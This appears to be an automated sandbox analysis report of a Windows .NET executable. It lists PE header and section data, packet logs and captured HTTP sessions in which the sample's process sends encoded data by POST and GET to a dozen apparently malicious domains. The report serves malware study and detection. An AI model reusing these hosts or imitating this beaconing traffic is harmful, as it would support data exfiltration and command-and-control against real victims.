                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x4d799a
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xF1A763D5 [Sun Jun 22 12:38:45 2098 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      push ebx
                                                                      add byte ptr [ecx+00h], bh
                                                                      jnc 00007F0268B6CAE2h
                                                                      je 00007F0268B6CAE2h
                                                                      add byte ptr [ebp+00h], ch
                                                                      add byte ptr [ecx+00h], al
                                                                      arpl word ptr [eax], ax
                                                                      je 00007F0268B6CAE2h
                                                                      imul eax, dword ptr [eax], 00610076h
                                                                      je 00007F0268B6CAE2h
                                                                      outsd
                                                                      add byte ptr [edx+00h], dh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd7947 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd8000 | 0x5cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xda000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd534c | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd59c0 | 0xd5a00 | 44caa83a5b295579526e87fd342b6ff1 | False | 0.8364769236395553 | data | 7.62366801353489 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd8000 | 0x5cc | 0x600 | 2b4249ceec5258cda4c747f078a31b57 | False | 0.4270833333333333 | data | 4.1141784050383965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xda000 | 0xc | 0x200 | 7bdf1ed0b0726fd942225190dcc0d8a4 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xd8090 | 0x33c | data | | | 0.42995169082125606
RT_MANIFEST | 0xd83dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Dec 10, 2024 15:16:29.314044952 CET4972880192.168.2.113.33.130.190
                                                                      Dec 10, 2024 15:16:29.433386087 CET80497283.33.130.190192.168.2.11
                                                                      Dec 10, 2024 15:16:34.816144943 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:34.935528040 CET8049729161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:34.935700893 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:34.951370001 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:35.070707083 CET8049729161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:36.180996895 CET8049729161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:36.181082964 CET8049729161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:36.181209087 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:36.182578087 CET8049729161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:36.182622910 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:36.465930939 CET4972980192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:37.485934019 CET4973080192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:37.605096102 CET8049730161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:37.605248928 CET4973080192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:37.626610994 CET4973080192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:37.745959997 CET8049730161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:38.850297928 CET8049730161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:38.850348949 CET8049730161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:38.850361109 CET8049730161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:38.851692915 CET4973080192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:39.139760017 CET4973080192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:40.157690048 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:40.277019978 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:40.277105093 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:40.317591906 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:40.436887026 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:40.437422991 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:41.539211988 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:41.539259911 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:41.539355040 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:41.539453983 CET8049731161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:41.539537907 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:41.825720072 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.845138073 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.964500904 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:42.967947006 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.979713917 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:43.099003077 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.212985992 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213069916 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213083029 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213169098 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213167906 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.213217974 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.219104052 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.338438034 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:52.412632942 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.532144070 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:52.532255888 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.620763063 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.745179892 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.026968956 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.026981115 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.027038097 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:54.137799025 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.179739952 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.299040079 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:55.299216032 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.379549026 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.498820066 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791238070 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791259050 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791327000 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:56.903278112 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:57.923352957 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.042901039 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:58.043004036 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.065290928 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.184551001 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:58.184618950 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:59.536801100 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:59.575237989 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.594234943 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.713635921 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:00.713799000 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.723587036 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.842858076 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208415031 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208903074 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208967924 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:02.230947971 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:02.350372076 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:08.253874063 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.373245955 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:08.373316050 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.395220995 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.514848948 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.903767109 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:09.950735092 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.950830936 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:09.951112986 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.951181889 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:10.022995949 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:10.023149014 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:10.923671961 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.043154955 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:11.043344975 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.061856031 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.181386948 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526433945 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526609898 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526668072 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:12.575125933 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.594377041 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.713680029 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:13.713982105 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.729052067 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.848378897 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:13.848489046 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:15.231589079 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:15.351766109 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:15.355936050 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.251024961 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.370476961 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:16.370562077 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.382314920 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.501705885 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.873094082 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.874558926 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.878047943 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:17.881861925 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:18.001161098 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:23.221843004 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.341309071 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:23.341535091 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.357057095 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.477154016 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658584118 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658595085 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658674002 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658709049 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:24.658740997 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:24.872260094 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:25.891041994 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.010530949 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:26.010601997 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.035084009 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.154442072 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.261723995 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.261820078 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.262032032 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:27.545830965 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.562994957 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.682311058 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:28.682487965 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.697606087 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.820826054 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:28.820837021 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.923934937 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924335003 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924510002 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924526930 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:29.924653053 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:30.200210094 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.221501112 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.340815067 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:31.342099905 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.354883909 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.474626064 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559376955 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559417963 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559432030 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559626102 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:32.564213037 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:32.685380936 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:38.138999939 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.259293079 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:38.259394884 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.277431965 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.396925926 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.482867956 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.483082056 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.485549927 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:39.799819946 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.813079119 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.932368040 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:40.932476997 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.950670958 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:41.072000980 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.181890965 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.182169914 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.182235003 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:42.468777895 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.486398935 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.605644941 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:43.605747938 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.623826981 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.743155003 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:43.743231058 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840209961 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840553999 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840655088 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:45.139828920 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.158123016 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.277638912 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:46.277719021 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.289422035 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.408886909 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:47.511436939 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:47.511750937 CET8049748209.74.77.107192.168.2.11
                                                                      • www.cyperla.xyz
                                                                      • www.cstrategy.online
                                                                      • www.madhf.tech
                                                                      • www.bser101pp.buzz
                                                                      • www.goldstarfootwear.shop
                                                                      • www.070002018.xyz
                                                                      • www.bienmaigrir.info
                                                                      • www.yc791022.asia
                                                                      • www.jalan2.online
                                                                      • www.beyondfitness.live
                                                                      • www.dietcoffee.online
                                                                      • www.smartcongress.net
                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.11 | 49711 | 31.186.11.114 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:15.400183916 CET | 357 | OUT | GET /qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.cyperla.xyz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:16.718899012 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Tue, 10 Dec 2024 14:15:16 GMT
                                                                      server: LiteSpeed
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                      Dec 10, 2024 15:15:16.719014883 CET | 253 | IN
                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.11 | 49713 | 194.76.119.60 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:33.517426014 CET | 632 | OUT | POST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeZhRaSSgo6GCQKhLm4fe1bwOgQk9qlNlIZQ==
                                                                      Dec 10, 2024 15:15:34.744210005 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.11 | 49714 | 194.76.119.60 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:36.195135117 CET | 652 | OUT | POST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjGiECcas8ABCc9Wtp+8/krBB3V+sWmkf7k=
                                                                      Dec 10, 2024 15:15:37.492311954 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:37 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.11 | 49715 | 194.76.119.60 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:38.855171919 CET | 1665 | OUT | POST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
